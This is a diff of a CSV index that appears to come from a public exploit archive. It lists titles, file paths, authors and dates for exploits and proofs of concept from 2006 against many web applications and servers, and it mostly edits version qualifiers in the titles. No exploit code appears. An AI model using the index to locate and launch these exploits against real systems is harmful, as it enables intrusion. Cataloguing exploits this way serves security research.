-1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 - (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 +1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 -1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 -1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 - (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 +1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 +1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - (search.php) SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 -1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 - (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 -1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 -1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 +1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - (function.php) Local File Inclusion Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 +1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 +1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) PoC",2006-03-27,posidron,windows,dos,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - (myadmin.php) User Privilege Escalation Exploit",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 -1618,platforms/php/webapps/1618.c,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 -1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 +1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 +1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 -1621,platforms/php/webapps/1621.php,"Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 -1622,platforms/multiple/dos/1622.pl,"RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 -1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 - (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 +1621,platforms/php/webapps/1621.php,"Plogger Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 +1622,platforms/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 +1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - (Scheme) SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 - (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 -1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 -1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 - (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 +1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 +1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 -1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 - (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 +1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 -1631,platforms/php/webapps/1631.php,"ReloadCMS <= 1.2.5 - Cross-Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 +1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow PoC Exploit",2006-04-02,darkeagle,windows,dos,0 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 - (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 -1641,platforms/linux/dos/1641.pl,"Libxine <= 1.14 MPEG Stream Buffer Overflow PoC",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 -1642,platforms/windows/dos/1642.c,"Ultr@VNC <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 -1643,platforms/windows/dos/1643.c,"Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 -1644,platforms/php/webapps/1644.pl,"INDEXU <= 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 -1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 -1646,platforms/php/webapps/1646.php,"phpMyChat <= 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 +1641,platforms/linux/dos/1641.pl,"Libxine 1.14 MPEG Stream Buffer Overflow PoC",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 +1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 +1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 client Log::ReallyPrint Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 +1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 +1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 +1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 -1650,platforms/php/webapps/1650.pl,"Horde Help Viewer <= 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 +1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) - Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0 -1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 - Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0 -1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 -1655,platforms/php/webapps/1655.php,"XBrite Members <= 1.1 - (id) Remote SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 +1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0 +1654,platforms/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 +1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - (id) SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0 -1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 -1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 -1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 -1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - Remote SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0 -1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 -1664,platforms/windows/remote/1664.py,"Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 -1665,platforms/php/webapps/1665.pl,"Sphider <= 1.3 - (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 -1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger <= 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 -1667,platforms/multiple/dos/1667.html,"Mozilla Firefox <= 1.5.0.1 / Camino <= 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 -1668,platforms/php/webapps/1668.php,"vBulletin ImpEx <= 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 -1669,platforms/cgi/webapps/1669.pl,"Censtore <= 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 -1670,platforms/cgi/webapps/1670.pl,"quizz <= 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 +1659,platforms/php/webapps/1659.php,"PHPList 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 +1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 +1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 +1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0 +1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 +1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 +1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 +1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 +1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 +1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 +1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 +1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 -1672,platforms/php/webapps/1672.pl,"PAJAX <= 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 -1673,platforms/php/webapps/1673.php,"phpWebSite <= 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 -1674,platforms/php/webapps/1674.txt,"osCommerce <= 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 +1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 +1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 +1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 -1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 +1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit (Metasploit)",2006-04-15,anonymous,windows,remote,8080 -1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 -1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 -1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 - (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 -1687,platforms/php/webapps/1687.txt,"MyEvent <= 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 +1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 +1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 +1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 +1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 - (Clock Synchronization) Denial of Service Exploit",2006-04-17,"Stefan Lochbihler",windows,dos,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 -1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 -1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 +1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 +1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 -1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 -1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 +1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 +1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 -1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 +1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - (userid) SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 -1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 -1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 +1706,platforms/php/webapps/1706.txt,"dForum 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 +1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 -1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 -1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 +1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 +1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 -1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0 -1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 +1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0 +1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 -1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 +1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0 -1719,platforms/multiple/local/1719.txt,"Oracle <= 10g Release 2 - (DBMS_EXPORT_EXTENSION) Local SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 -1720,platforms/php/webapps/1720.pl,"Invision Power Board <= 2.1.5 - (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 +1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - (DBMS_EXPORT_EXTENSION) SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 +1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow PoC",2006-04-27,"Dedi Dwianto",windows,dos,0 -1722,platforms/php/webapps/1722.txt,"TopList <= 1.3.8 - (phpBB Hack) Remote File Inclusion",2006-04-27,[Oo],php,webapps,0 -1723,platforms/php/webapps/1723.txt,"Advanced GuestBook <= 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 -1724,platforms/php/webapps/1724.pl,"TopList <= 1.3.8 - (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 -1725,platforms/php/webapps/1725.pl,"Advanced GuestBook <= 2.4.0 - (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 -1726,platforms/php/webapps/1726.pl,"Invision Power Board <= 2.1.5 - search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 -1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0 -1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion",2006-04-27,[Oo],php,webapps,0 +1723,platforms/php/webapps/1723.txt,"Advanced GuestBook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 +1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 +1725,platforms/php/webapps/1725.pl,"Advanced GuestBook 2.4.0 - (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 +1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 +1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0 +1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 -1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 +1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 -1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 -1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 -1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 -1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 +1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 +1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 +1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 +1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 -1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 -1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 +1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 +1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 -1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0 +1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF 